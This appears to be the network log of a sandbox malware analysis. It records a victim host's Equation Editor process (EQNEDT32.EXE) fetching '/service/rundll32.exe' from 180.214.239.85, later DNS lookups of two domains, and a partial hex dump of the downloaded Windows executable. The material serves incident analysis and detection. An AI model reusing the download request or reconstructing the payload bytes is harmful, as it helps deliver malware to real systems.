Sep 27, 2021 14:04:16.160017014 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.160022974 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.160034895 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.160044909 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.160063028 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.160068035 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.160079956 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.160089016 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.160106897 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.160115004 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.160129070 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.160135984 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.160145998 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.160156965 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.160172939 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.160176039 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.160196066 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.160209894 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.160228014 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.160233974 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.160244942 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.160262108 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.160271883 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.160289049 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.160300970 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.160311937 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.160330057 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.160335064 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.160351038 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.160358906 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.160366058 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.160382032 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.160399914 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.160406113 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.160428047 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.160429955 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.160444021 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.160456896 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.160465002 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.160481930 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.160500050 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.160505056 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.160515070 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.160527945 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.160543919 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.160551071 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.160563946 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.160573959 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.160592079 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.160598040 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.160610914 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.160621881 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.160640001 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.160648108 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.160655975 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.160674095 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.160686970 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.160696030 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.160720110 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.160720110 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.160733938 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.160753965 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.160788059 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.160811901 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.160830021 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.160835028 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.160847902 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.160867929 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.160893917 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.160918951 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.160936117 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.160942078 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.160954952 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.160964966 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.160981894 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.160999060 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.161004066 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.161041021 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.161664963 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.161737919 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.161757946 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.161784887 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.161803007 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.161808968 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.161823034 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.161833048 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.161844015 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.161858082 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.161875963 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.161881924 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.161905050 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.161921024 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.161938906 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.162031889 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.162056923 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.162080050 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.162081003 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.162098885 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.162108898 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.162117958 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.162134886 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.162148952 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.162158966 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.162168980 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.162183046 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.162199974 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.162205935 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.162228107 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.162244081 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.162261963 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.162266970 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.162277937 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.162290096 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.162307024 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.162316084 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.162326097 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.162342072 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.162359953 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.162364960 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.162378073 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.162408113 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.162914038 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.162942886 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.162966013 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.162974119 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.162992954 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.163002014 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.163022041 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.163038969 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.163079023 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.163141966 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.163173914 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.163219929 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.163464069 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.163491011 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.163511992 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.163513899 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.163531065 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.163533926 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.163552046 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.163558006 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.163568974 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.163580894 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.163599014 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.163609028 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.163618088 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.163633108 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.163649082 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.163655996 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.163669109 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.163696051 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.163702011 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.163726091 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.163744926 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.163750887 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.163764000 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.163780928 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.163798094 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.163804054 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.163816929 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.163830042 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.163846016 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.163852930 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.163863897 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.163880110 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.163891077 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.163906097 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.163923979 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.163929939 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.163939953 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.163953066 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.163966894 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.163974047 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.163986921 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.164005995 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.164516926 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.187777042 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.954366922 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:05:31.191185951 CEST	49166	80	192.168.2.22	128.65.195.232
Sep 27, 2021 14:05:31.207000971 CEST	80	49166	128.65.195.232	192.168.2.22
Sep 27, 2021 14:05:31.207079887 CEST	49166	80	192.168.2.22	128.65.195.232
Sep 27, 2021 14:05:31.207247972 CEST	49166	80	192.168.2.22	128.65.195.232
Sep 27, 2021 14:05:31.225320101 CEST	80	49166	128.65.195.232	192.168.2.22
Sep 27, 2021 14:05:31.225341082 CEST	80	49166	128.65.195.232	192.168.2.22
Sep 27, 2021 14:05:31.225512981 CEST	49166	80	192.168.2.22	128.65.195.232
Sep 27, 2021 14:05:31.225640059 CEST	49166	80	192.168.2.22	128.65.195.232
Sep 27, 2021 14:05:31.241245985 CEST	80	49166	128.65.195.232	192.168.2.22
Sep 27, 2021 14:05:49.432673931 CEST	49167	80	192.168.2.22	34.102.136.180
Sep 27, 2021 14:05:49.445827007 CEST	80	49167	34.102.136.180	192.168.2.22
Sep 27, 2021 14:05:49.445930958 CEST	49167	80	192.168.2.22	34.102.136.180
Sep 27, 2021 14:05:49.446181059 CEST	49167	80	192.168.2.22	34.102.136.180
Sep 27, 2021 14:05:49.458626032 CEST	80	49167	34.102.136.180	192.168.2.22
Sep 27, 2021 14:05:49.561790943 CEST	80	49167	34.102.136.180	192.168.2.22
Sep 27, 2021 14:05:49.561851025 CEST	80	49167	34.102.136.180	192.168.2.22
Sep 27, 2021 14:05:49.561950922 CEST	49167	80	192.168.2.22	34.102.136.180
Sep 27, 2021 14:05:49.561983109 CEST	49167	80	192.168.2.22	34.102.136.180
Sep 27, 2021 14:05:49.574595928 CEST	80	49167	34.102.136.180	192.168.2.22

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 27, 2021 14:05:31.143651962 CEST	52167	53	192.168.2.22	8.8.8.8
Sep 27, 2021 14:05:31.177267075 CEST	53	52167	8.8.8.8	192.168.2.22
Sep 27, 2021 14:05:49.398300886 CEST	50591	53	192.168.2.22	8.8.8.8
Sep 27, 2021 14:05:49.430988073 CEST	53	50591	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Sep 27, 2021 14:05:31.143651962 CEST	192.168.2.22	8.8.8.8	0x8eb8	Standard query (0)	www.paradisgrp.com	A (IP address)	IN (0x0001)
Sep 27, 2021 14:05:49.398300886 CEST	192.168.2.22	8.8.8.8	0xc18c	Standard query (0)	www.uvoyus.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Sep 27, 2021 14:05:31.177267075 CEST	8.8.8.8	192.168.2.22	0x8eb8	No error (0)	www.paradisgrp.com		128.65.195.232	A (IP address)	IN (0x0001)
Sep 27, 2021 14:05:49.430988073 CEST	8.8.8.8	192.168.2.22	0xc18c	No error (0)	www.uvoyus.com	uvoyus.com		CNAME (Canonical name)	IN (0x0001)
Sep 27, 2021 14:05:49.430988073 CEST	8.8.8.8	192.168.2.22	0xc18c	No error (0)	uvoyus.com		34.102.136.180	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

180.214.239.85

www.paradisgrp.com

www.uvoyus.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49165	180.214.239.85	80	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp	kBytes transferred	Direction	Data
Sep 27, 2021 14:04:12.525746107 CEST	0	OUT	GET /service/rundll32.exe HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 180.214.239.85 Connection: Keep-Alive
Sep 27, 2021 14:04:12.877863884 CEST	1	IN	HTTP/1.1 200 OK Date: Mon, 27 Sep 2021 12:04:10 GMT Server: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28 Last-Modified: Mon, 27 Sep 2021 09:26:10 GMT ETag: "a7600-5ccf6b00272b4" Accept-Ranges: bytes Content-Length: 685568 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdownload Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 cf 8d 51 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 6a 0a 00 00 0a 00 00 00 00 00 00 ee 88 0a 00 00 20 00 00 00 a0 0a 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 0a 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 9c 88 0a 00 4f 00 00 00 00 a0 0a 00 60 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 0a 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 04 69 0a 00 00 20 00 00 00 6a 0a 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 60 06 00 00 00 a0 0a 00 00 08 00 00 00 6c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 c0 0a 00 00 02 00 00 00 74 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 88 0a 00 00 00 00 00 48 00 00 00 02 00 05 00 dc 43 02 00 f0 f2 00 00 03 00 00 00 01 01 00 06 cc 36 03 00 d0 51 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 22 02 03 7d 01 00 00 04 2a 1e 02 7b 01 00 00 04 2a 22 02 03 7d 02 00 00 04 2a 1e 02 7b 02 00 00 04 2a 22 02 03 7d 03 00 00 04 2a 1e 02 7b 03 00 00 04 2a 22 02 03 7d 04 00 00 04 2a 1e 02 7b 04 00 00 04 2a 22 02 03 7d 05 00 00 04 2a 1e 02 7b 05 00 00 04 2a 22 02 03 7d 06 00 00 04 2a 1e 02 7b 06 00 00 04 2a 22 02 03 7d 07 00 00 04 2a 1e 02 7b 07 00 00 04 2a 22 02 03 7d 08 00 00 04 2a 1e 02 7b 08 00 00 04 2a 22 02 03 7d 09 00 00 04 2a 1e 02 7b 09 00 00 04 2a 22 02 03 7d 0a 00 00 04 2a 1e 02 7b 0a 00 00 04 2a 22 02 03 7d 0b 00 00 04 2a 1e 02 7b 0b 00 00 04 2a 22 02 03 7d 0c 00 00 04 2a 1e 02 7b 0c 00 00 04 2a 22 02 03 7d 0d 00 00 04 2a 1e 02 7b 0d 00 00 04 2a 22 02 03 7d 0e 00 00 04 2a 1e 02 7b 0e 00 00 04 2a 22 02 03 7d 0f 00 00 04 2a 1e 02 7b 0f 00 00 04 2a 22 02 03 7d 10 00 00 04 2a 1e 02 7b 10 00 00 04 2a 13 30 02 00 71 00 00 00 00 00 00 00 02 28 17 00 00 0a 00 00 02 16 28 19 00 00 06 00 02 16 28 1b 00 00 06 00 02 16 28 1d 00 00 06 00 02 16 28 15 00 00 06 00 02 16 28 0f 00 00 06 00 02 16 28 17 00 00 06 00 02 16 28 09 00 00 06 00 02 16 28 09 00 00 06 00 02 16 28 01 00 00 06 00 02 16 28 03 00 00 06 00 02 16 28 0d 00 00 06 00 02 16 28 13 00 00 06 00 02 16 28 1f 00 00 06 00 2a 6a 00 02 03 28 19 00 00 06 00 02 04 28 1b 00 00 06 00 02 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELQa0j @ @O` H.texti j `.rsrc`l@@.reloct@BHC6Q"}{"}{"}{"}{"}{"}{"}{"}{"}{"}{"}{"}{"}{"}{"}{"}{0q((((((((((((((*j((
Sep 27, 2021 14:04:12.877912045 CEST	3	IN	Data Raw: 05 28 1d 00 00 06 00 2a 2a 00 02 03 28 0d 00 00 06 00 2a 4a 00 02 03 28 09 00 00 06 00 02 04 28 0b 00 00 06 00 2a 4a 00 02 03 28 01 00 00 06 00 02 04 28 05 00 00 06 00 2a 4a 00 02 03 28 03 00 00 06 00 02 04 28 07 00 00 06 00 2a 2a 00 02 03 28 1f Data Ascii: (*(J((J((J((((*(J((*(0s!(o(o(o(o(o(o(
Sep 27, 2021 14:04:12.877931118 CEST	4	IN	Data Raw: 00 00 1b 30 03 00 00 0b 00 00 03 00 00 11 00 02 28 02 00 00 06 0a 06 39 82 02 00 00 00 00 03 50 6f 62 01 00 06 6f 18 00 00 0a 0b 38 50 02 00 00 12 01 28 19 00 00 0a 0c 00 08 6f 26 01 00 06 72 01 00 00 70 28 1a 00 00 0a 2d 12 08 6f 26 01 00 06 72 Data Ascii: 0(9Pobo8P(o&rp(-o&rp(,o,rp(+9o"((9oi.ok+,oio)r%po++ogo)r%po+o&rp(
Sep 27, 2021 14:04:12.877960920 CEST	5	IN	Data Raw: 00 00 0a 00 dc 00 02 28 0a 00 00 06 2c 08 02 28 0c 00 00 06 2b 01 16 13 1a 11 1a 39 57 01 00 00 00 00 03 50 6f 62 01 00 06 6f 18 00 00 0a 13 1b 38 24 01 00 00 12 1b 28 19 00 00 0a 13 1c 00 11 1c 6f 22 01 00 06 72 1b 00 00 70 28 1a 00 00 0a 2c 11 Data Ascii: (,(+9WPobo8$(o"rp(,o og+9ogo)rSpo+o Y8Poboo&r-p(-Poboo&r3p(,(,!PobYoo&r3
Sep 27, 2021 14:04:13.248920918 CEST	7	IN	Data Raw: 1e 00 00 0a 04 6f 67 01 00 06 6f 29 01 00 06 00 03 50 6f 62 01 00 06 11 34 6f 1e 00 00 0a 72 6f 00 00 70 6f 2b 01 00 06 00 2b 4b 11 25 16 fe 01 13 36 11 36 2c 1d 00 11 23 04 6f 67 01 00 06 6f 29 01 00 06 00 11 23 72 6f 00 00 70 6f 2b 01 00 06 00 Data Ascii: ogo)Pob4oropo++K%66,#ogo)#ropo+4X44#o /4+77:+"(:"o*Adcs"\7-
Sep 27, 2021 14:04:13.248961926 CEST	8	IN	Data Raw: 84 2e 10 2b 00 11 15 20 8f b9 b4 f6 2e 47 38 d0 01 00 00 11 13 72 91 00 00 70 28 1a 00 00 0a 3a b5 00 00 00 38 ba 01 00 00 11 13 72 97 00 00 70 28 1a 00 00 0a 3a b2 00 00 00 38 a4 01 00 00 11 13 72 9d 00 00 70 28 1a 00 00 0a 3a b1 00 00 00 38 8e Data Ascii: .+ .G8rp(:8rp(:8rp(:8rp(:8xrp(:8brp(:8Lrp(:86rp(:8 rp(:8sQsE8sW
Sep 27, 2021 14:04:13.248976946 CEST	10	IN	Data Raw: 0d 72 d3 00 00 70 6f 2f 00 00 0a 13 12 11 0d 11 12 11 0d 6f 2a 00 00 0a 11 12 59 6f 2b 00 00 0a 13 13 11 0d 16 11 12 17 59 6f 2b 00 00 0a 13 14 11 13 11 14 73 6e 00 00 06 11 0b 73 45 00 00 06 13 09 2b 4b 73 73 00 00 06 11 0b 73 45 00 00 06 13 09 Data Ascii: rpo/o*Yo+Yo+snsE+KsssE+;svsE++rp('o((+sgsE+Xi:o3,%o4Xo5+o6o7%:
Sep 27, 2021 14:04:13.248989105 CEST	11	IN	Data Raw: 6f 6d 00 00 06 72 23 01 00 70 28 1a 00 00 0a 13 30 11 30 2c 06 11 25 18 5a 13 25 00 11 24 6f 42 00 00 06 16 fe 01 13 31 11 31 2c 06 11 25 17 58 13 25 11 22 11 25 5a 13 22 00 12 23 28 4e 00 00 0a 3a bc fe ff ff de 0f 12 23 fe 16 11 00 00 1b 6f 1d Data Ascii: omr#p(00,%Z%$oB11,%X%"%Z"#(N:#o(OoCozoP"o9X"X (Q:O o(OoCo{22,(R:ooF3+K3
Sep 27, 2021 14:04:13.249036074 CEST	12	IN	Data Raw: 0a 13 5f 2b 30 12 5f 28 5c 00 00 0a 13 60 00 11 60 6f 2c 00 00 06 13 61 11 61 17 6f 09 00 00 06 00 11 61 17 6f 0b 00 00 06 00 11 41 11 61 6f 57 00 00 0a 00 00 12 5f 28 5d 00 00 0a 2d c7 de 0f 12 5f fe 16 15 00 00 1b 6f 1d 00 00 0a 00 dc 00 2b 58 Data Ascii: _+0_(\``o,aaoaoAaoW_(]-_o+X;o[b+0b(\cco,ddodoAdoWb(]-bo8@oDuee9@oDtffo^o^g8g(_
